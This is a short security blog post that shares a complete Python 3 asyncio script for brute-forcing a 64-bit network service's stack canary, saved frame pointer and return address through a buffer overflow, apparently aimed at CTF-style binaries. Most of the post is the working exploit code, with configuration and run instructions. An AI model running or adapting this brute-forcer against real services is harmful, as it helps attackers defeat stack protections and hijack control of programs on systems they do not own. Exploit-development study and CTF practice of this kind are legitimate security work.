Xh4H

Home GitHub Twitter
9 August 2019

Bruteforcing 64 bits binaries with python 3

by Xh4H

Introduction

Hello, I wanted to share with you a script made in Python 3 without pwntools (pwntools has a dev3 branch which supports python3).

The following script will bruteforce asynchronously the following addresses:

This has been built to bruteforce 64 bits binaries with the following details:

Since this process is being done asynchronously, the needed time to extract these 3 addresses is reduced a lot compared to a single threaded-single task bruteforce.

How to run

There are 3 global variables that need to be modified according to our needs.

HOST has to point to a valid and resolvable host, such as localhost, 10.10.10.10, etc.

PORT has to point to a valid port, such as 1337, 8006, 5050, etc.

BUFFER_OVERFLOW_OFFSET has to contain a numeric offset where the binary being bruteforced crashes by overflowing the buffer. If the binary crashes after 80 characters, this variable will contain that number.

Since this is made for python 3, please run it with python3. No command line arguments are required.

Output

The script will output the latest tested payload, Canary, EBP and return address hexadecimal addresses and time needed to bruteforce:

Script

import asyncio, struct, time

initial_time = time.time()
BUFFER_OVERFLOW_OFFSET = 0x38 # offset at which buffer overflow occurs
HOST = "localhost"
PORT = 1337

class SuccessException(Exception):
	pass

def finished():
	finished_time = time.time()
	total = finished_time - initial_time
	print("Bruteforcing finished, time needed: %d s." % total)

try_order = [0] + [x for x in range(1, 256)][::-1]

def u64(data):
	return struct.unpack('<Q', data)[0]

async def try_char(prepend, char, semaphore):
	async with semaphore:
		reader, writer = await asyncio.open_connection(host=HOST, port=PORT)
		payload	= prepend
		payload += bytes([char])

		await reader.read(52)
		writer.write(payload)

		result = await reader.read(-1)

		writer.close()

		if result:
			exception = SuccessException()
			exception.char = char
			raise exception

async def start():
	semaphore = asyncio.BoundedSemaphore(20)

	prepend = b'A' * BUFFER_OVERFLOW_OFFSET
	for _ in range(16):
		print(prepend)
		futures = [asyncio.ensure_future(try_char(prepend, x, semaphore)) for x in try_order]
		done, pending = await asyncio.wait(futures, return_when=asyncio.FIRST_EXCEPTION)
		for pending_task in pending:
			pending_task.cancel()
		for done_task in done:
			try:
				done_task.result()
			except SuccessException as e:
				prepend += bytes([e.char])
				break

	prepend += bytes([0x62]) # 0x62 specific to the tested binary, can be b''
	for _ in range(7): # in case the above line is b'', change to range(8)
		print(prepend)
		futures = [asyncio.ensure_future(try_char(prepend, x, semaphore)) for x in try_order]
		done, pending = await asyncio.wait(futures, return_when=asyncio.FIRST_EXCEPTION)
		for pending_task in pending:
			pending_task.cancel()
		for done_task in done:
			try:
				done_task.result()
			except SuccessException as e:
				prepend += bytes([e.char])
				break

	canary = u64(prepend[BUFFER_OVERFLOW_OFFSET:BUFFER_OVERFLOW_OFFSET+8])
	ebp = u64(prepend[BUFFER_OVERFLOW_OFFSET+8:BUFFER_OVERFLOW_OFFSET+8+8])
	return_addr = u64(prepend[BUFFER_OVERFLOW_OFFSET+8+8:BUFFER_OVERFLOW_OFFSET+8+8+8])

	print('[*] Canary: 0x%x\n[*] EBP: 0x%x\n[*] ret_addr: 0x%x' % (canary, ebp, return_addr))
	finished()
	

loop = asyncio.get_event_loop()
loop.run_until_complete(start())

Props to goeo for his asynchronous skills.

Thanks for reading :)

tags: bruteforce - overflow - python3 - script